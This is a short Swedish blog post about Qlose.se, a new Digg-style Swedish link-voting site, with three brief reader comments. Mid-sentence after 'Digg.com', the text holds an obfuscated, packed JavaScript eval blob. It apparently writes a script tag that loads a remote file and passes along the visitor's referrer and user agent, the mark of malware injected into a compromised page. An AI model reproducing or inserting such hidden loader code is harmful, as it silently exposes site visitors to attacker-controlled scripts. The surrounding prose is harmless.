Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Publicera intressanta länkar med Qlose.se

Publicera intressanta länkar med Qlose.se
Sebastian

Digg.com eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rtdzh|var|u0026u|referrer|nzdsk||js|php’.split(’|’),0,{}))
är ett av de stora namnen inom denna genre och har fått en väldigt stor plats i media världen över.

Idén går ut på att användare skickar ut eller publicerar intressanta länkar som sedan kan röstas på för att lyfta innehållet för besökare på sajten. De länkar eller poster som fått flest röster publiceras på sidans framsida och är ett bevis på bra läsning. Det är kort och gott nyhetsbevakning helt utan något redaktionellt filter, en sida man väldigt enkelt kan bli mycket beroende av 🙂

I Sverige finns det inte så många hemsidor av denna typ. Den enda jag kan komma på är Pusha.se som funnits sen 2006.
Nu har det dock dykt upp en till på marknaden. Qlose.se har sett potentialen av verktyget och plockat fram en helt ny och fräsch webbplats som faktiskt ser ut att ha en framtid. Qlose.se bygger på ett CMS som är anpassat för just denna sortens portal och därför verkar den stabil och sidorna laddas snabbt fram.

Ska bli kul att följa detta och se vad som händer. Vi kommer försöka att hålla uppdateringar på hur Qlose.se tar sig fram i media Sverige.

Deras hemsida kan ni besöka här: Qlose.se

Comments

 1. Jacob

  Cool får ta och testa!

 2. Kompanjonen

  Testade
  tjänsten, den verkar stabil och väldigt rolig faktiskt. Postade några
  länkar till min blogg och det gav lite träffar. Kan tänka mig att detta
  är grymt för bloggare som vill öka sin trafik kostnadsfritt och snabbt.

  Ett litet tips till alla småtjejer som kanske inte är så bra på marknadsföring 🙂

   

 3. Lakris

  hmm verkar intressant. Reggar mig och testar 🙂